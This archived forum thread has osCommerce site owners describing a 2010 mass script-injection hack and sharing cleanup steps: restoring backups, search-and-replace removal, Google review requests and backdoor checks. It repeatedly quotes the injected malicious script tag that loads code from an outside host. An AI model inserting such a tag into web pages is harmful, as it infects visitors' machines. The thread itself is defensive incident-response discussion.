coves Posted September 22, 2010 Posted September 22, 2010 My site has been hacked... I have removed <script src="http://nt04.in/3"> from many many pages (must be some automated task attacking my pages) but am having trouble finding the script in the link shown below. The script is not in "product_reviews" or "currency".... can someone help me understand how I find this malware script from the url shown below.... right now google has me tagged as a malware site, search engins have me shut down.... www.mysite/product_reviews.php?currency=EUR&products_id=41 www.mysite/product_reviews_info.php?products_id=43&reviews_id=11 Thanks Coves
germ Posted September 22, 2010 Posted September 22, 2010 How to Secure Your Site If you PM your URL I can probably help pinpoint what files you should be looking in. Or maybe you can do it yourself. Look at the html source. There are comments in the source like this: <!-- header //--> ... (much HTML here) <!-- header_eof //--> That tell you when you enter and exit a file. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
keithro Posted September 22, 2010 Posted September 22, 2010 I'm experiencing the exact same thing right now....any public help would be greatly appreciated also!
germ Posted September 22, 2010 Posted September 22, 2010 How to Secure Your Site Click it. Without your URL that's as good as it gets. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
coves Posted September 23, 2010 Author Posted September 23, 2010 germ, I sent you a PM email with more info Cheers Coves
germ Posted September 23, 2010 Posted September 23, 2010 germ, I sent you a PM email with more info Cheers Coves No PM received - Yet. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
nicole zhang Posted September 23, 2010 Posted September 23, 2010 My site has been hacked... I have removed <script src="http://nt04.in/3"> from many many pages (must be some automated task attacking my pages) but am having trouble finding the script in the link shown below. The script is not in "product_reviews" or "currency".... can someone help me understand how I find this malware script from the url shown below.... right now google has me tagged as a malware site, search engins have me shut down.... www.mysite/product_reviews.php?currency=EUR&products_id=41 www.mysite/product_reviews_info.php?products_id=43&reviews_id=11 Thanks Coves Hello Coves,I gone throgh the some awful exprience just the day before yestoday.I seached almost everywhere to find a solution,includes removed the automated added codes manually,but they would be added then.Here is a way to removed them quickly: Please log in your account on www.godaddy.com,and restore your website to any day in a month,for example 2010.09.20.You can see how to restore it here:http://help.godaddy.com/article/5091. Hope can help you, Nicole.
coves Posted September 23, 2010 Author Posted September 23, 2010 germ, did you get my PM? Nicole, I am not hosted with godaddy, thanks very much though, it looks like you need to be with them for your solution Thanks for the help, need to clean out those 2 files urgently to get back up and running, and then add some security patches to reduce the chance of it happening again. Coves
coves Posted September 24, 2010 Author Posted September 24, 2010 Just an update, did a lot of clean up work, FTP's my entire site to my computer, did a search and replace using GrepWin (works fantastic!), to replace the injected script with 'nothing', over 344 occurances, veryfied findings using "File Hound 3.08".... and pushed the entire site back to the hosting server. So everything should be clean, as long as I didn't miss any files during the FTP process since that was not 100% clean, had to re-do manually, several areas. I have re-submitted a review request with Google, we'll see what happens, keep my fingures crossed... Next step is to add security code per the link from germ... I think this is simular to what Nicole was suggesting except without using the hosting providers plug, thanks Nicole!
♥mdtaylorlrim Posted September 24, 2010 Posted September 24, 2010 Next step is to add security code per the link from germ... I think this is simular to what Nicole was suggesting except without using the hosting providers plug, thanks Nicole! You should have done that before you upload the new, clean files back to your server. You would be amazed at how fast the hackers can find and infect your site... Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...?
troubleshooter2000 Posted October 1, 2010 Posted October 1, 2010 Oh. God.. I am having the same problem and I did a lot of update in the past week. Last backup I have is from 24 Sep and if I restore that it would set me back quite a bit... germ, please help. I am pm-ing my URL to you...
paeonia Posted October 2, 2010 Posted October 2, 2010 I am having the same problem. So sorry to bother you, germ, but could you please help me too? How do I PM my url to you?
coves Posted October 2, 2010 Author Posted October 2, 2010 Please read what I had to do to correct the issue, you do not have to re-store your site from an old backup if it is not up to date. Try to FTP your site to a save location on your PC, scan and clean all your files using the programs suggested above and then FTP your clean site back to your host. Request a review from Google, and it will likely be cleared by next day. You should also look at installing some security code which I have done. This works and it's not as bad as it sounds. Hope this helps, not to knock germ, but I did not get any help from him and I think that because the work comes back to you, you have to help yourself by doing the clean up Cheers! Coves
germ Posted October 3, 2010 Posted October 3, 2010 Please read what I had to do to correct the issue, you do not have to re-store your site from an old backup if it is not up to date. Try to FTP your site to a save location on your PC, scan and clean all your files using the programs suggested above and then FTP your clean site back to your host. Request a review from Google, and it will likely be cleared by next day. You should also look at installing some security code which I have done. This works and it's not as bad as it sounds. Hope this helps, not to knock germ, but I did not get any help from him and I think that because the work comes back to you, you have to help yourself by doing the clean up Cheers! Coves I went to your site (multiple pages and times) and I could never see what you posted in the HTML source or anything else that even remotely looked like malware so just what did you expect of me? :unsure: The truth is that someone who can't recognize rogue code is going to have a difficult time cleaning a site. I wouldn't trust virus scanners on a Windows PC to clean a site- that's a whole other world compared to a UNIX driven website. What is considered a "virus" on a UNIX Website may be just another text file to a Windows virus scanner. @paeonia I went to your site and it tried to infect my machine... :blush: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
coves Posted October 3, 2010 Author Posted October 3, 2010 Hey germ. I really appreciate the feedback. Just for the record, once I FTP'd my site to my pc, I scanned all .php and other files for the text script that I posted previously <script src="http://nt04.in/3">, these programs found approx 400 files infected with this script, so all I had to do was a swap and replace to remove the script. Like you said though, it was very difficult to find every occurance using file manager in cpanel and that is why I started looking for help, needed help finding the files that didn't appear to have the script but was being reported as having it, and help to find something that could potentially scan and remove it right on the site verses FTP'g it to my computer. Thanks again germ, you did help, you gave me that push to keep going! Cheers Coves
Juack Posted October 12, 2010 Posted October 12, 2010 first of all you have to detect which vulnerability has been exploited. You ca do it by a forensic analysis (more appropriate) or by a vulnerability scan. After you can restore old backup and resolve the vuln and to perform an additional vulnerability scan.
sucuri Posted October 13, 2010 Posted October 13, 2010 I said that in a few posts already, but I will repeat :) Check for backdoors! We have been checking / fixing many oscommerce sites and all of them had many hidden. Inside the /images, inside /js, etc. Also check for spam inside your application_bottom.php. We posted some details here: blog.sucuri.net/2010/10/oscommerce-attacks-kirm-sky-ru.html thanks,
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.